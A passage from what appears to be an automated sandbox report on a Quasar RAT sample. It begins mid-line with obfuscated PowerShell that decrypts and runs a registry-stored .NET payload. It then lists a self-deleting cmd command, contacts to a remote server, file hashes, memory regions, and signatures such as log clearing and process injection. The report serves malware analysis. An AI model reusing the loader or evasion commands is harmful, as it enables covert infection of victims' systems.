-join '')($OATYX, 0, $OATYX.Length);$OATYX = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($OATYX);$pxqaL = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VOurjNNOAf3rWCyDVTfXEg==');$pxqaL = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($pxqaL, 0, $pxqaL.Length);$pxqaL = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($pxqaL);$sZmZm = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bwCwxwfgvgLvd83CID2tuY2PW5n2F6O9HvfP0OXG8B2If0HCFuJvOfQkZnJJHGqr4W77keqJnrHoUOLsxavQfVPJgnZi5dCVwfqInTPzI5sB/ovu8wzR06kYDbDCFSZIUmhZnetqX07nQ3nN2G8dx8hDcvN8OEtke141bP5XbYA7V7pEdDf3FgqTYuWoMaz+k56vPVibKCooeH7zQ3DK29EBBQ9NAhbbXDFzReMv7zlMDbkoqlsAAEqbrXnoCu5yb4MKtcf+DHcvr/3wdC9bIKzrVR+Z59S5tuu5Ot2efgPcTwmjF9AfsSO6Z0XGodft9zU2RXKHKxayYhES9v/HDue0kdAd1egn28t4LVgg/sk/Lq23+HYJ+gLzHX2a8njudWREXxqxpxGUV/yJzhNVaEtLryDlFlbG61xiz9rtJRc=');$sZmZm = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($sZmZm, 0, $sZmZm.Length);$sZmZm = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($sZmZm);$hunvf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('rq5zXkyy0NL/id4X1CFNpQ==');$hunvf = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hunvf, 0, $hunvf.Length);$hunvf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($hunvf);$uooKb = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wR0HI5liF2OH5JSIeYrcUA==');$uooKb = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($uooKb, 0, $uooKb.Length);$uooKb = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($uooKb);$HssPO = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wr1hAjwP3vd25eg2X2PyLA==');$HssPO = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($HssPO, 0, $HssPO.Length);$HssPO = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($HssPO);$coosp = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('W+228sMz/VVvzW5Wi2DfeQ==');$coosp = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($coosp, 0, $coosp.Length);$coosp = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($coosp);$cqFrb = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('LnPkErAMqZ8UA2dOM3NRUw==');$cqFrb = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($cqFrb, 0, $cqFrb.Length);$cqFrb = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($cqFrb);$RVcQq0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jzKuA/Szphx4DaASO5/17A==');$RVcQq0 = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq0, 0, $RVcQq0.Length);$RVcQq0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq0);$RVcQq1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('KBGLdnELndsDRqQwc9+ZdQ==');$RVcQq1 = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq1, 0, $RVcQq1.Length);$RVcQq1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq1);$RVcQq2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('h0utQU1KufGAbeZac8uGpg==');$RVcQq2 = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq2, 0, $RVcQq2.Length);$RVcQq2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq2);$RVcQq3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('NHOzA0blhk4FfOP1QwdrHA==');$RVcQq3 = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq3, 0, $RVcQq3.Length);$RVcQq3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq3);$dKTJk.Dispose();$zljWq1.Dispose();if (@(get-process -ea silentlycontinue $RVcQq3).count -gt 1) {exit};$wqkcL = [Microsoft.Win32.Registry]::$coosp.$HssPO($RVcQq).$uooKb($OATYX);$khgFI=[string[]]$wqkcL.Split('\');$IeVcP=pIPqe(sXCMM([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($khgFI[1])));OVJQF $IeVcP (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$dgCqa = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($khgFI[0]);$zljWq = New-Object System.Security.Cryptography.AesManaged;$zljWq.Mode = [System.Security.Cryptography.CipherMode]::CBC;$zljWq.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$zljWq.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2j38zfvlS2eG10+5Bn8oKr9nVYk0RQST+LfAJHy33f0=');$zljWq.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dQc6M4a1U8SkygTmibGyDg==');$QOVuV = $zljWq.('rotpyrceDetaerC'[-1..-15] -join '')();$dgCqa = $QOVuV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($dgCqa, 0, $dgCqa.Length);$QOVuV.Dispose();$zljWq.Dispose();$RVxvX = New-Object System.IO.MemoryStream(, $dgCqa);$MPpXr = New-Object System.IO.MemoryStream;$tIDwQ = New-Object System.IO.Compression.GZipStream($RVxvX, [IO.Compression.CompressionMode]::$RVcQq1);$tIDwQ.$cqFrb($MPpXr);$tIDwQ.Dispose();$RVxvX.Dispose();$MPpXr.Dispose();$dgCqa = $MPpXr.ToArray();$tbTTb = $sZmZm | IEX;$QhIbf = $tbTTb::$RVcQq2($dgCqa);$edhhl = $QhIbf.EntryPoint;$edhhl.$RVcQq0($null, (, [string[]] ($pxqaL)))

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{da4eb554-3736-4161-9cfe-54b4c4bbe8d1}

C:\Windows\SysWOW64\dllhost.exe

C:\Windows\SysWOW64\dllhost.exe /Processid:{712cfe24-71b0-4334-a10e-3818da35c53b}

C:\Windows\system32\backgroundTaskHost.exe

"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{f405f003-1c50-4b0a-b5bb-3e75beac0cbc}

C:\Windows\SysWOW64\dllhost.exe

C:\Windows\SysWOW64\dllhost.exe /Processid:{25858422-c4c2-4908-9a08-2b4d7b932eda}

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{2468371f-4996-4a2c-89cc-83db20afff50}

C:\Windows\SysWOW64\dllhost.exe

C:\Windows\SysWOW64\dllhost.exe /Processid:{d2e8fd25-94fc-4467-a178-71c63d482411}

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{40b72183-8e7a-49d9-9e75-c966d0c547ce}

C:\Windows\SysWOW64\dllhost.exe

C:\Windows\SysWOW64\dllhost.exe /Processid:{2e4e3c33-3a48-4b2e-b5c3-b67a093182d3}

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{f62e8cdb-b511-4d32-b1e4-fe6d21f7f6b0}

C:\Windows\SysWOW64\dllhost.exe

C:\Windows\SysWOW64\dllhost.exe /Processid:{86c31b53-4071-4d3f-b3df-39bdea9c266a}

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{50abcaee-ecb8-4880-853f-06694794bbaa}

C:\Windows\SysWOW64\dllhost.exe

C:\Windows\SysWOW64\dllhost.exe /Processid:{2cead3ed-2f85-4cfa-81a4-13d4c72b3eca}

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k WerSvcGroup

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2504 -ip 2504

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{c8bd73d1-5a15-4f0d-b38a-f24da5bfc179}

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2504 -s 472

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -pss -s 664 -p 2804 -ip 2804

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 2804 -s 308

C:\Windows\SysWOW64\dllhost.exe

C:\Windows\SysWOW64\dllhost.exe /Processid:{58b78572-f955-4b05-9bd9-b76de2e56cf3}

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 696 -p 6060 -ip 6060

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 6060 -s 356

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C PING localhost -n 8 >NUL & taskkill /F /IM "C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe" & ATTRIB -h -s "C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe" & del /f "C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe" & exit

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\PING.EXE

PING localhost -n 8

C:\Windows\system32\taskkill.exe

taskkill /F /IM "C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe"

C:\Windows\system32\attrib.exe

ATTRIB -h -s "C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 73.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
FR 163.5.215.216:4782 tcp
FR 163.5.215.216:4782 tcp

Files

C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe

MD5 0e9ccd796e251916133392539572a374
SHA1 eee0b7e9fdb295ea97c5f2e7c7ba3ac7f4085204
SHA256 c7d4e119149a7150b7101a4bd9fffbf659fba76d058f7bf6cc73c99fb36e8221
SHA512 e15c3696e2c96874242d3b0731ce0c790387ccce9a83a19634aed4d1efef72ce8b8fa683069950d652b16cd8d5e9daae9910df6d0a75cb74fdbe90ae5186765d

memory/552-4-0x00007FFA62A03000-0x00007FFA62A05000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_axpmm0rm.tmg.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/552-13-0x0000020E608A0000-0x0000020E608C2000-memory.dmp

memory/552-14-0x00007FFA62A00000-0x00007FFA634C2000-memory.dmp

memory/552-15-0x00007FFA62A00000-0x00007FFA634C2000-memory.dmp

memory/552-16-0x00007FFA62A00000-0x00007FFA634C2000-memory.dmp

memory/552-17-0x0000020E48520000-0x0000020E48544000-memory.dmp

memory/552-19-0x00007FFA835A0000-0x00007FFA8365D000-memory.dmp

memory/552-18-0x00007FFA844C0000-0x00007FFA846C9000-memory.dmp

memory/552-20-0x00007FFA62A00000-0x00007FFA634C2000-memory.dmp

memory/552-21-0x00007FFA62A03000-0x00007FFA62A05000-memory.dmp

memory/552-23-0x00007FFA62A00000-0x00007FFA634C2000-memory.dmp

memory/552-22-0x00007FFA62A00000-0x00007FFA634C2000-memory.dmp

memory/552-24-0x00007FFA62A00000-0x00007FFA634C2000-memory.dmp

memory/552-25-0x0000020E60E10000-0x0000020E61860000-memory.dmp

memory/552-27-0x0000020E61860000-0x0000020E61906000-memory.dmp

memory/552-28-0x0000020E61910000-0x0000020E61966000-memory.dmp

memory/552-29-0x0000020E61970000-0x0000020E619C8000-memory.dmp

memory/552-33-0x0000020E60B10000-0x0000020E60B1A000-memory.dmp

memory/4672-35-0x0000000140000000-0x0000000140004000-memory.dmp

memory/552-30-0x0000020E48550000-0x0000020E48572000-memory.dmp

memory/4672-37-0x0000000140000000-0x0000000140004000-memory.dmp

memory/552-34-0x00007FFA62A00000-0x00007FFA634C2000-memory.dmp

memory/552-31-0x00007FFA844C0000-0x00007FFA846C9000-memory.dmp

memory/1996-38-0x0000000000400000-0x0000000000406000-memory.dmp

memory/1996-40-0x0000000000400000-0x0000000000406000-memory.dmp

memory/552-41-0x00007FFA62A00000-0x00007FFA634C2000-memory.dmp

memory/552-42-0x00007FFA62A00000-0x00007FFA634C2000-memory.dmp

C:\Windows\$sxr-mshta.exe

MD5 356e04e106f6987a19938df67dea0b76
SHA1 f2fd7cde5f97427e497dfb07b7f682149dc896fb
SHA256 4ed8a115fa1dcfd532397b800775c1b54d2d407b52118b5423e94ff1ce855d7e
SHA512 df1c655fa3a95e001084af8c3aa97c54dbcb690210e1353dd836702cfb4af3c857449df62aa62d7ab525ffb4e0dc1552181dfcdee2c28f4af5c20df6d95811cd

C:\Windows\$sxr-cmd.exe

MD5 c5db7b712f280c3ae4f731ad7d5ea171
SHA1 e8717ff0d40e01fd3b06de2aa5a401bed1c907cc
SHA256 f6c9532e1f4b66be96f0f56bd7c3a3c1997ea8066b91bfcc984e41f072c347ba
SHA512 bceaf7dc30f2c99b40b7025a5eb063f3131a1ef9349fdf356720eaef838bcf58ce3d5e3bad9459ddd2f872df430bdb66a766a5acff5d3bbc738eba8945cb0a89

memory/2656-64-0x000001604E790000-0x000001604E7B4000-memory.dmp

memory/2656-66-0x00007FFA835A0000-0x00007FFA8365D000-memory.dmp

memory/2656-65-0x00007FFA844C0000-0x00007FFA846C9000-memory.dmp

memory/2656-67-0x0000016066CD0000-0x0000016067254000-memory.dmp

memory/2656-68-0x000001606F720000-0x000001606FEEA000-memory.dmp

memory/2656-69-0x000001606FEF0000-0x000001607032E000-memory.dmp

memory/2656-70-0x0000016070330000-0x00000160703E2000-memory.dmp

memory/552-71-0x00007FFA62A00000-0x00007FFA634C2000-memory.dmp

memory/2656-72-0x00000160703E0000-0x0000016070402000-memory.dmp

memory/2656-73-0x00007FFA844C0000-0x00007FFA846C9000-memory.dmp

memory/2656-81-0x00000160676A0000-0x00000160676F0000-memory.dmp

memory/2656-82-0x00000160677B0000-0x0000016067862000-memory.dmp

memory/2656-83-0x0000016067A40000-0x0000016067C02000-memory.dmp

memory/552-92-0x00007FFA62A00000-0x00007FFA634C2000-memory.dmp

memory/2656-93-0x00000160676F0000-0x000001606772C000-memory.dmp

memory/2656-94-0x0000016067650000-0x000001606769E000-memory.dmp

memory/2656-95-0x00007FFA844C0000-0x00007FFA846C9000-memory.dmp

memory/2656-96-0x00007FFA835A0000-0x00007FFA8365D000-memory.dmp

memory/2656-97-0x0000016067730000-0x0000016067766000-memory.dmp

memory/1528-98-0x0000000140000000-0x0000000140028000-memory.dmp

memory/1528-99-0x0000000140000000-0x0000000140028000-memory.dmp

memory/1528-101-0x00007FFA835A0000-0x00007FFA8365D000-memory.dmp

memory/1528-100-0x00007FFA844C0000-0x00007FFA846C9000-memory.dmp

memory/1528-102-0x0000000140000000-0x0000000140028000-memory.dmp

memory/648-113-0x00007FFA44550000-0x00007FFA44560000-memory.dmp

memory/1012-118-0x00007FFA44550000-0x00007FFA44560000-memory.dmp

memory/780-122-0x00007FFA44550000-0x00007FFA44560000-memory.dmp

memory/1084-129-0x000001E20D8B0000-0x000001E20D8D7000-memory.dmp

memory/1200-140-0x000001796BE90000-0x000001796BEB7000-memory.dmp

memory/1200-141-0x00007FFA44550000-0x00007FFA44560000-memory.dmp

memory/1092-138-0x00007FFA44550000-0x00007FFA44560000-memory.dmp

memory/1092-137-0x0000016EC9740000-0x0000016EC9767000-memory.dmp

memory/1084-130-0x00007FFA44550000-0x00007FFA44560000-memory.dmp

memory/628-127-0x00007FFA44550000-0x00007FFA44560000-memory.dmp

memory/628-126-0x000001F51C730000-0x000001F51C757000-memory.dmp

memory/780-121-0x000001F30C9D0000-0x000001F30C9F7000-memory.dmp

memory/1012-117-0x0000021A78940000-0x0000021A78967000-memory.dmp

memory/704-115-0x00007FFA44550000-0x00007FFA44560000-memory.dmp

memory/448-111-0x00007FFA44550000-0x00007FFA44560000-memory.dmp

memory/448-110-0x000001E414B40000-0x000001E414B67000-memory.dmp

memory/704-109-0x000001FBD8460000-0x000001FBD8487000-memory.dmp

memory/648-105-0x00000249A1680000-0x00000249A16A7000-memory.dmp

memory/648-104-0x00000249A1650000-0x00000249A1672000-memory.dmp

memory/552-375-0x00007FFA62A00000-0x00007FFA634C2000-memory.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER.8dc8a17a-3e56-4183-9e3e-4c36840b2fd9.tmp.csv

MD5 3c4a1965d4c56cdb2679767b2dc2348c
SHA1 7aaee80698d80220a1200ed29aa358348bee0294
SHA256 9e6bb64cee9826e04d68be5587c5853ea02972685151abf465c7c8e6c133a1c2
SHA512 28c111a484ae656868bf942ef4d5c1079b054814b7f844cfe3dcdc3477cc834865e377421440a81479c25ea96388e736dc0d98fcb3c4e92bf77f541ebe3c836f

C:\ProgramData\Microsoft\Windows\WER\Temp\WER.de06e259-7074-4cc8-bc62-70e4c22a68fc.tmp.txt

MD5 4a026e04c2b3faa82a8716ab632035b2
SHA1 125f8ddb7cbe42b5681ea7c2b10ccf60e0ca8458
SHA256 c46d1ff5d3c424fa7dccb7a5751fd9f5c230e0fd336a6cc3a5eea4ccc4f08c0b
SHA512 8e78d984af962f0ea878153af3d2d7796aa5a56d211aecfa15c0eb1f621ac8421228d254e738d4f120f47d6819d4071c8fd8c7a9d0a700e7a58c0aa9ff640a30

C:\ProgramData\Microsoft\Windows\WER\Temp\WER.4ec0bf67-f5d0-40c1-b1eb-b0262db871e8.tmp.csv

MD5 5c7d4424c0206de538c84512aff4acb8
SHA1 5c999ebbb2c7bb6b6eea1539826c01e97baf0468
SHA256 8b345ec2770271ec8174fb48e089144ef182d7e0163009e8930ad2f53bccd35f
SHA512 d3192d582ad59d25646bc686b28db2a18b514179d8c2c970cca8a17f0bc4f72f2536a7a422c48a9769d630808c34f02c75432cfc0bea5682b877396e12adbb4e

C:\ProgramData\Microsoft\Windows\WER\Temp\WER.15f745ea-299c-4809-9330-d8ecebf4f5da.tmp.txt

MD5 5100664edb873952f210febdc9b061f0
SHA1 9ade4234c3e4b4d34d977ba47ce61696e33576eb
SHA256 9d10ffafefa66265489ffb2bac91b511e60a6344dcb0a60d764617430f663575
SHA512 d88364d452e8f49bde17107d1c7b3b056e92d2c6398b2aacd5dbe37cca966f21d6d255ceffe4190d509a3fed22b4c81ae048d98d6c09958ab980cd64674bef92

C:\ProgramData\Microsoft\Windows\WER\Temp\WER.9abea24d-0d76-4344-bf68-bd1d66a7d33e.tmp.csv

MD5 760f33d64a2005296ec2984480f1998a
SHA1 c1b44ba448a5670a26ee2fac984bf8504b47e9f2
SHA256 65b7945fd01e7c92d4eb4a2c1a11e4140dbe4c2db4bb88149e496dd2a8a2aae8
SHA512 a834b6b10ebc5c72e9bc3e217fd24118b20ede3075f1523cc17ff5fcc6c9c9ffa715e0964c2a32a9dc5a7ee001af2e0c692f45c837f7476ffa7235f59dc21a5c

C:\ProgramData\Microsoft\Windows\WER\Temp\WER.31f23360-6ef1-4caa-8810-37ca873d5b83.tmp.txt

MD5 a3f78579d0e85640326d3842ac9d0b28
SHA1 f9078ae972ac9b57c4475b604afe2627feb35d85
SHA256 b872d5239f2fc516d13dda7963f6909490ad7bb67a61dd8e4dd3398d76a2bf12
SHA512 c1b00ec809afd3a3e7644b0303b92acf102562444c70ec57069b1c743855835aee04fc352f8eaa5ab059e8170541e5288aa13844464d44f174ffee77c6ea4d46

memory/552-1457-0x00007FFA62A00000-0x00007FFA634C2000-memory.dmp

Analysis: behavioral8

Detonation Overview

Submitted

2024-08-18 13:35

Reported

2024-08-18 13:37

Platform

win11-20240802-en

Max time kernel

59s

Max time network

53s

Command Line

winlogon.exe

Signatures

Quasar RAT

trojan spyware quasar

Quasar payload

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of NtCreateProcessExOtherParentProcess

Description Indicator Process Target
PID 5292 created 5172 N/A C:\Windows\system32\WerFault.exe C:\Windows\System32\dllhost.exe
PID 1180 created 3140 N/A C:\Windows\system32\WerFault.exe C:\Windows\$sxr-powershell.exe

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Indicator Removal: Clear Windows Event Logs

defense_evasion
Description Indicator Process Target
File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-WER-Diag%4Operational.evtx C:\Windows\System32\svchost.exe N/A

Hide Artifacts: Hidden Window

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\$sxr-powershell.exe N/A
N/A N/A C:\Windows\$sxr-powershell.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4644 set thread context of 1980 N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe C:\Windows\System32\dllhost.exe
PID 4644 set thread context of 2700 N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe C:\Windows\SysWOW64\dllhost.exe
PID 3140 set thread context of 4868 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 3140 set thread context of 2880 N/A C:\Windows\$sxr-powershell.exe C:\Windows\SysWOW64\dllhost.exe
PID 3140 set thread context of 4716 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 3140 set thread context of 2600 N/A C:\Windows\$sxr-powershell.exe C:\Windows\SysWOW64\dllhost.exe
PID 4644 set thread context of 4436 N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe C:\Windows\System32\dllhost.exe
PID 4644 set thread context of 3896 N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe C:\Windows\SysWOW64\dllhost.exe
PID 3140 set thread context of 3604 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 3140 set thread context of 5768 N/A C:\Windows\$sxr-powershell.exe C:\Windows\SysWOW64\dllhost.exe
PID 3140 set thread context of 5876 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 3140 set thread context of 1788 N/A C:\Windows\$sxr-powershell.exe C:\Windows\SysWOW64\dllhost.exe
PID 3140 set thread context of 5172 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 3140 set thread context of 5748 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 3140 set thread context of 4712 N/A C:\Windows\$sxr-powershell.exe C:\Windows\SysWOW64\dllhost.exe
PID 1404 set thread context of 4472 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 1404 set thread context of 5248 N/A C:\Windows\$sxr-powershell.exe C:\Windows\SysWOW64\dllhost.exe

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\$sxr-mshta.exe C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe N/A
File opened for modification C:\Windows\$sxr-mshta.exe C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe N/A
File created C:\Windows\$sxr-cmd.exe C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe N/A
File opened for modification C:\Windows\$sxr-cmd.exe C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe N/A
File created C:\Windows\$sxr-powershell.exe C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe N/A
File opened for modification C:\Windows\$sxr-powershell.exe C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe N/A

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\dllhost.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\dllhost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\dllhost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\dllhost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WerFault.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\dllhost.exe N/A

System Network Configuration Discovery: Internet Connection Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\System32\cmd.exe N/A
N/A N/A C:\Windows\system32\PING.EXE N/A

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 C:\Windows\system32\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision C:\Windows\system32\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Windows\SysWOW64\WerFault.exe N/A
Key opened \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\system32\svchost.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier C:\Windows\system32\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\system32\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 C:\Windows\system32\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision C:\Windows\system32\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\system32\svchost.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 C:\Windows\SysWOW64\WerFault.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Windows\system32\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\system32\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier C:\Windows\system32\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\system32\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Windows\system32\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Windows\system32\WerFault.exe N/A
